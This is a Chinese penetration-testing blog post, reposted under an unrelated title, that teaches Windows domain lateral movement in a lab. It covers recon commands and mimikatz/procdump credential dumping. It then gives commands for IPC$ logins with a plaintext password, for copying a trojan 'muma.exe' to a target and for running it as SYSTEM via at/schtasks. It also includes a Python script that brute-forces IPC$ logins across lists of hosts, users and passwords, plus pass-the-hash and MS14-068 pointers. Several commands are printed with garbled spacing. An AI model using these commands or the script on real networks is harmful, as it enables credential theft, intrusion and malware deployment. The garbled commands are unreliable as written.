当前位置:首页 > 网站源码 > 正文内容

系统哈希值验证(哈希校验在线转换)

网站源码1年前 (2023-09-13)305

网安教育

培养网络安全人才

技术交流、学习咨询

0x00 Preface

内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。

内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)

内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解

实操部分写的比较草率,主要是为了增强认知、扩展思路、扩充知识面。实际上有很多优秀的集成化工具,很少会拆分开来单独使用这些方法。当然,大多数情况下是要考虑免杀的,免杀时可能会将某一步操作拆分出来,单独进行免杀和利用。

0x01 信息收集

查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞:

1systeminfo

查看启动进程,可以根据启动进程判断主机在域中扮演的角色:

1netstart

展开全文

查看进程列表:

1tasklist

查看端口开放情况:

1netstat-ano

判断是否存在域:

1netview /domain

查看主机名、域DNS、IP:

1ipconfig/ all

查看域内主机:

1netview

域内主机以域服务器时间为准,故该命令可用于判断DC:

1nettime /domain

查看IP:

1nslookup域名

查看登录信息:

1netconfig workstation

查看用户信息:

1whoami/ all

查看域内用户,可以将其作为字典,对其他主机的密码进行爆破:

1netuser /domain

这个命令在DC上可以直接执行,在其他域主机上执行要求打开DC的RPC服务。

探针域内存活主机:

1for/L %I in ( 1, 1, 254) DO @ping -w 1-n 1192.168. 52.%I | findstr "TTL="

当然也可以借助nmap、masscan等第三方工具或empire、nishang等第三方脚本,但是使用系统命令的最大好处就是不用考虑免杀。

域内其实还有一台机器STU1,但它开了防火墙,所以是禁ping的,这可能也是前面net view时没有显示STU1的原因。我们关了防火墙再试一遍:

计算机用户Hash、明文获取:

mimikatz:Win;mimipenguin:Linux。

计算机各种协议、服务口令的获取:

LaZagne:适用于Windows、Linux、Mac。支持面广,但功能一般。

XenArmor:Win,付费。

探测域内存活主机及地址信息:

自带的内部命令(.bat)、nmap、masscan、powershell第三方脚本:empire、nishang。

需要注意的是,Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。

mimikatz下载:

https://github.com/gentilkiwi/mimikatz/releases

procdump下载:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

0x02 IPC&SMB&VMI

前面已经说了,内网渗透主要是基于口令的攻击。同一域内的主机不计其数,域用户不计其数,为了便于记忆和管理,域成员的密码很多都会有重合。当我们拿到某个域成员的密码,就可以利用它把口子越撕越大,不断丰富我们的密码字典,然后不断地对域内主机进行爆破,直至拿下DC。

Windows提供了许多协议和相关功能,我们可以利用这些功能和协议传递用户的凭证进行验证。

一、SMB 协议

SMB 一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外通过 SMB 协议,应用程序可以访问远程服务器端的文件、以及打印机、邮件槽(mailslot)、命名管道(named pipe)等资源。

在 TCP/IP 环境下,客户机通过 NetBIOS over TCP/IP(或 NetBEUI/TCP 或 SPX/IPX)连接服务器。一旦连接成功,客户机可发送 SMB

命令到服务器上,从而客户机能够访问共享目录、打开文件、读写文件,以及一切在文件系统上能做的所有事情。

这么说吧,域内最重要的是啥?一个是为了保障安全(内网与外网相隔绝),另一个就是资源共享,毕竟大家都是一条船上的人。SMB 协议就是用于实现各种资源的共享的,其中就包括IPC连接中的命名管道。

在Windows NT中SMB基于NBT实现。而在Windows2000中,SMB除了基于NBT的实现,还有直接通过445端口实现。NBT(NetBIOS over TCP/IP):使用137, 138 (UDP) and 139 (TCP)来实现基于TCP/IP的NETBIOS网际互联。

我的理解就是,445是139的升级,139实现条件比445更苛刻,但两者都是为了实现SMB协议,因此两者并不冲突。在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。

二、IPC

IPC(Inter-Process Communication,进程间通信),进程间通信是指两个进程的数据之间产生交互。进程间通信主要方式有共享内存、消息队列、管道等。其中共享内存主要用于同一计算机内进程间通信,消息队列和管道主要用于分布式环境(通信进程位于通过网络连接的不同计算机)。

“命名管道”又名“命名管线”(Named Pipes),是一种简单的进程间通信(IPC)机制,Microsoft Windows大都提供了对它的支持(但不包括Windows CE)。命名管道可在同一台计算机的不同进程之间或在跨越一个网络的不同计算机的不同进程之间,支持可靠的、单向或双向的数据通信。推荐用命名管道作为进程通信方案的一项重要的原因是它们充分利用了Windows内建的安全特性(ACL等)。

与TCP/IP(传输控制协议或internet协议)一样,命名管道是一种通讯协议。它一般用于局域网中,因为它要求客户端必须具有访问服务器资源的权限(SMB协议)。

在快速局域网 (LAN) 环境中,传输控制协议或 Internet 协议 (TCP/IP) 套接字客户端和 Named Pipes 客户端在性能方面不相上下。但是网络速度越慢,TCP/IP 套接字客户端与 Named Pipes 客户端的性能差异越明显。这是因为TCP/IP 套接字的数据传输的效率更高,开销也更少。数据传输还可以利用 TCP/IP 套接字性能增强机制的优点,如开窗口、延迟确认等,这在慢速网络中可能非常有益。而对于命名管道,通常网络通信交互性更强。一个对等项直到另一个对等项使用读取命令请求数据时才发送数据。在开始读取数据前,网络读取一般包括一系列窥视命名管道的信息。这在慢速网络中可能花费非常多并导致过多的网络流量,其它的网络客户端反过来也会受到影响。

使用命名管道的原因一般有两个方面:

提高速度:假设同样在局域网中,那么使用命名管道协议会比TCP/IP协议快一些。

增加安全性:因为命名管道是只能用于局域网的,那么如果服务器关闭了TCP/IP协议而仅启用命名管道,就可以避免一些安全隐患。

三、VMI

Windows管理工具(WMI)由一组扩展到的Windows驱动程序模型。WMI允许脚本语言(例如VB或Windows PowerShell)来本地或远程管理Microsoft Windows个人电脑和服务器。

简单来说,咱们在cmd或者powershell中使用的命令行语言,就是VMI支持的,它提供给我们一个接口如powershell,便于我们管理计算机。

谈及远程管理,延申几个比较重要的端口,如22、23、135、139、445、3389等。139、445端口我们前面已经讨论过了,22端口是linux的ssh,23端口是telnet,3389是远程桌面连接rdp,这些都比较好理解。咱们重点来说一下135端口。

135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够包括HTTP协议在内的多种网络传输。

进程间通信(IPC)是在多任务操作系统或联网的计算机之间运行的程序和进程所用的通信技术。有两种类型的进程间通信(IPC)。

本地过程调用(LPC):LPC用在多任务操作系统中,使得同时运行的任务能互相会话。这些任务共享内存空间使任务同步和互相发送信息。

远程过程调用(RPC):RPC类似于LPC,只是在网上工作。RPC开始是出现在Sun微系统公司和HP公司的运行UNⅨ操作系统的计算机中。

简单来说,RPC就是用于支持远程IPC的连接。无论是本地连接还是远程连接,都要依托于VMI服务进行管理。

四、小结

SMB协议用于实现共享,IPC用于建立连接,不连接怎么共享?前面已经说了,共享是包括命名管道的,而命名管道正是连接方式,因此SMB协议的共享其实是包含IPC的,不仅如此,它还依赖于IPC连接。但是归根结底,对于连接后的计算机的远程管理,还是要依托于VMI。

0x03 at&schtasks

at&schtasks用于创建定时任务,其中at<Windows2012,schtasks>=Windows2012。

利用场景:

已拿下内网中一台主机的权限(webserver),掌握该主机的域用户名和密码,知道域内其他用户名。

利用流程:

1.建立IPC连接到目标主机(明文密码)

2.copy要执行的命令脚本到目标主机

3.查看目标时间,创建计划任务(at、schtasks)定时执行copy的脚本

4.删除IPC连接

查看当前网络连接:

1netuse

使用明文密码hongrisec@2021与192.168.52.143的god\administrator用户建立远程IPC连接:

1netuse \\ 192.168.52.143\ipc$ "hongrisec@2021"/user:god\administrator

先将恶意文件上传到外围打点时拿下权限的webserver上,再通过前面建立的远程IPC连接将恶意文件从webserver copy到目标主机:

1copyC:\Users\liukaifeng01\Desktop\muma.exe \\ 192.168.52.143\C$

一、at<Windows2012

Windows2012以下版本,添加计时任务:

1at\\192 .168.52.14315 :30C:\ muma.exe

二、schtasks>=Windows2012

Windows2012及以上版本,创建计时任务对应文件:

1schtasks/create /s 192.168.52.143/ru "SYSTEM"/tn adduser /sc DAILY /tr C:\muma.exe /F

运行adduser任务:

1schtasks/run /s 192.168.52.143/tn adduser

删除adduser任务:

1schtasks/delete /s 192.168.52.143/tn adduser

系统哈希值验证(哈希校验在线转换)

三、impacket

impacket是一个打包好的工具包,里面包含了对于各种协议和系统命令的利用工具。对于at&schtasks,我们可以使用impacket中的atexec.exe,使用它可以轻松地进行远程连接并执行系统命令。

python版impacket下载:

https://github.com/SecureAuthCorp/impacket

exe版impacket下载:

https://gitee.com/RichChigga/impacket-examples-windows

在实战中,当我们拿下了webserver,获取了webserver上的密码以及所有的域用户、本地用户、域内存活主机IP后,我们就可以以用户为用户字典、IP为IP字典、密码为密码字典,进行批量连接(碰撞),探测哪些主机可以成功连接。一旦成功连接,便意味着我们可以通过计划任务等方式拿到连接的主机权限。拿到新的主机权限后,我们就可以获得新的主机密码,然后丰富自己的密码字典,再进行批量连接(碰撞)。循环往复,直至拿下DC。

如上图所示,使用bat脚本只能遍历一个变量,如果想要同时遍历三个变量,可以使用python。例如建立三个列表,使用三个循环进行遍历,循环生成命令执行语句(string),最后使用python os模块中的os.system函数执行系统命令。但需要注意的是,域内主机上很可能没有python环境,因此我们需要借助python中的pyinstaller模块,它可以将py脚本打包成可执行文件,直接在windows上运行:

1pipinstallpyinstaller

2pyinstaller-Fapp.py

1import os,time

2ips={

3'192.168.3.21',

4'192.168.3.25',

5'192.168.3.29',

6'192.168.3.30',

7'192.168.3.31',

8'192.168.3.33'

9}

10

11users={

12'Administrator',

13'boss',

14'dbadmin',

15'fileadmin',

16'mack',

17'mary',

18'vpnadm',

19'webadmin'

20}

21passs={

22'admin',

23'admin!@#45',

24'Admin12345'

25}

26

27forip inips:

28foruser inusers:

29formima inpasss:

30exec= "net use \"+ "\ "+ip+'\ipc$ '+mima+' /user:god\'+user

31print('--->'+exec+'<---')

32os.system(exec)

33time.sleep(1)

34

0x04 smb&wmi

利用思路不变,变的仅是命令。

psexec是微软官方pstools中的工具,所以不需要考虑免杀。其中上图中说到,psexec第二种方法和smbexec无需建立IPC连接,我认为是不合理的。这几种方法只是命令不同罢了,提供明文账户密码的时候也是要建立IPC连接的,因为这个利用就是基于IPC的共享。

另外需要注意的就是,官方是不支持hash连接的,如果想要使用hash连接(仅能得到hash),可以使用impacket工具包,但是要做好免杀。

我个人认为,前面介绍的几种方法没啥区别,都是基于IPC$共享,都需要139/445端口的开启,初此之外,还离不开135端口,因为135端口时用于支持远程IPC建立的。IPC$共享的目的是为了便于管理员进行远程操作和管理,但是我们可以利用验证时的回显进行密码爆破。

0x05 pth&ptk&ptt

PTH:pass the hash(LM、NTLM)

PTK:pass the key(AES 256)

PTT:pass the ticket

针对以上情况,我们提供了如下解决方案:

1.利用hash传递(pth、ptk等)进行移动

2.利用注册表操作开启 Wdigest Auth 值进行获取

3.利用工具或第三方平台(Hashcat)进行破解获取

Windows认证采用LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。

如果仅得到了Hash,既可以尝试在本机破解,也可以使用前面介绍的impacket。impacket中的工具能传递hash并能直接执行系统命令,优点:自带提权,命令简洁,功能强大。缺点:非官方工具,容易被杀。

PTH、PTK均可以使用mimikatz进行获取和攻击,这里不再赘述,mimikatz相关使用自行百度。

hash破解工具hashcat下载:https://github.com/hashcat/hashcat

PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的。

Kerberos 协议具体工作方法,在域中,简要介绍一下:

1.客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用

krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检

测试成功之后创建 TGT(Ticket-Granting Ticket)

2.将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读

取 kerberos 中 TGT 数据

3.然后客户机将 TGT 发送给域控制器 KDC 请求 TGS(票证授权服务)票证,并且对 TGT 进行检测

4.检测成功之后,将目标服务账户的 NTLM 以及 TGT 进行加密,将加密后的结果返回给客户机。

说白了,票据就跟cookie一样,我们需要获取新鲜的cookie(未过期,主机登录后十小时左右过期),然后注入内存当中,通过伪装混过认证。

这个可以通过漏洞poc或工具进行利用,MS14-068下载:

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

工具kekeo下载:

https://github.com/gentilkiwi/kekeo/releases

0x06 Reference

SQL Server中的命名管道(named pipe)及其使用

进程间通信(IPC):共享内存和消息队列原理详解

命名管道 TCP/IP协议 匿名管道

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

版权声明:本文为CSDN博主「O快到碗里来」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。

版权声明:著作权归作者所有。如有侵权请联系删除

开源聚合网安训练营

环境搭建

Python

学员专辑

信息收集

CNVD

安全求职

渗透实战

CVE

高薪揭秘

渗透测试工具

网络安全行业

神秘大礼包

基础教程

我们贴心备至

用户答疑

QQ在线客服

加入社群

QQ+微信等着你

我就知道你“在看”

扫描二维码推送至手机访问。

版权声明:本文由我的模板布,如需转载请注明出处。


本文链接:http://60200875.com/post/30574.html

分享给朋友:

“系统哈希值验证(哈希校验在线转换)” 的相关文章

微信班级群应用小程序(班级群应用小程序咋使)

微信班级群应用小程序(班级群应用小程序咋使)

本篇文章给大家谈谈微信班级群应用小程序,以及班级群应用小程序咋使对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。 本文目录一览: 1、微信班级群小助手是老师在操作吗? 2、微信班级打卡小程序...

幼儿园家长会ppt模板(幼儿园家长会ppt内容 模板)

幼儿园家长会ppt模板(幼儿园家长会ppt内容 模板)

本篇文章给大家谈谈幼儿园家长会ppt模板,以及幼儿园家长会ppt内容 模板对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。 本文目录一览: 1、哪里有家长会ppt模板? 2、哦吼~86套幼儿...

微信恶搞代码生成器(微信代码生成器下载手机版)

微信恶搞代码生成器(微信代码生成器下载手机版)

本篇文章给大家谈谈微信恶搞代码生成器,以及微信代码生成器下载手机版对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。 本文目录一览: 1、微信二维码生成器(微信公众号怎么制作) 2、谁有1.1...

指南针电脑版炒股软件下载(指南针炒股软件教程)

指南针电脑版炒股软件下载(指南针炒股软件教程)

今天给各位分享指南针电脑版炒股软件下载的知识,其中也会对指南针炒股软件教程进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!本文目录一览: 1、指南针电脑版多开 2、求几款好点...

简洁ppt模板下载免费(ppt模板免费下载简约)

简洁ppt模板下载免费(ppt模板免费下载简约)

今天给各位分享简洁ppt模板下载免费的知识,其中也会对ppt模板免费下载简约进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!本文目录一览: 1、觅知网ppt模板如何免费下载...

北京市96中学官方网站(北京第96中学官网)

北京市96中学官方网站(北京第96中学官网)

本篇文章给大家谈谈北京市96中学官方网站,以及北京第96中学官网对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。 本文目录一览: 1、北京96中学是重点中学吗 2、天津市96中学录取分数线...